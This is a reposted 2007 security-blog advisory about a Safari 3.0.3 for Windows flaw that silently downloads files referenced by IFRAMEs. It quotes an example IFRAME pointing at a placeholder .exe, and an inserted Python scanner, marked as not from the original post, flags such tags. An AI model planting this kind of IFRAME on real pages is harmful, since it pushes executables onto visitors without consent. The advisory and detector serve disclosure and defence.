Tuesday, October 09, 2007 10:00 AM cmosby

Zero-day Flaw in Safari 3.0.03 Web Browser for Windows - TrendLabs | Malware Blog


Zero-day Flaw in Safari 3.0.03 Web Browser for Windows

October 8th, 2007 by Lordian Mosuela

A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,

<iframe src="http://www.XXXX.com/XXXX.exe" name="iframe" id="iframe"></iframe>

Unlike IE and Firefox, which display an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any notification at all.

A behind-the-scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being instructed to download the file.
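A defensive check that a content filter or proxy could apply for exactly this pattern, flagging pages whose IFRAME points straight at an executable. This is an added Python example, not code from the TrendLabs post; the host names are placeholders, and the extensions beyond .exe are an assumed generalisation of the case described.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions Windows treats as directly executable. ".exe" is the case from
# the post; the others are an assumed generalisation.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi"}


def is_executable_url(url):
    """True if the URL's path component ends in an executable extension."""
    # Inspect only the path so "?track=1" or "#frag" cannot hide the extension.
    path = urlparse(url.strip()).path.lower()
    return any(path.endswith(ext) for ext in EXECUTABLE_EXTENSIONS)


class IframeExecutableFinder(HTMLParser):
    """Collects the src of every iframe/frame tag that references an executable."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <IFRAME SRC=...> is caught too.
        if tag not in ("iframe", "frame"):
            return
        src = dict(attrs).get("src")
        if src and is_executable_url(src):
            self.findings.append(src)


def find_executable_iframes(html):
    """Return the list of iframe/frame src URLs that point at executables."""
    parser = IframeExecutableFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page modelled on the tag quoted in the post (placeholder host).
SAMPLE_HTML = """
<html><body>
<p>Welcome</p>
<iframe src="http://www.example.invalid/XXXX.exe" name="iframe" id="iframe"></iframe>
<iframe src="http://www.example.invalid/page.html"></iframe>
<IFRAME SRC="http://www.example.invalid/setup.EXE?track=1"></IFRAME>
</body></html>
"""

if __name__ == "__main__":
    for url in find_executable_iframes(SAMPLE_HTML):
        print("iframe points at an executable:", url)
```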

The flaw has clear potential for misuse: it allows a site to place files on a system without the user's knowledge or consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.

Additional information provided by Leander Yu.

Source: Zero-day Flaw in Safari 3.0.03 Web Browser for Windows - TrendLabs | Malware Blog - by Trend Micro
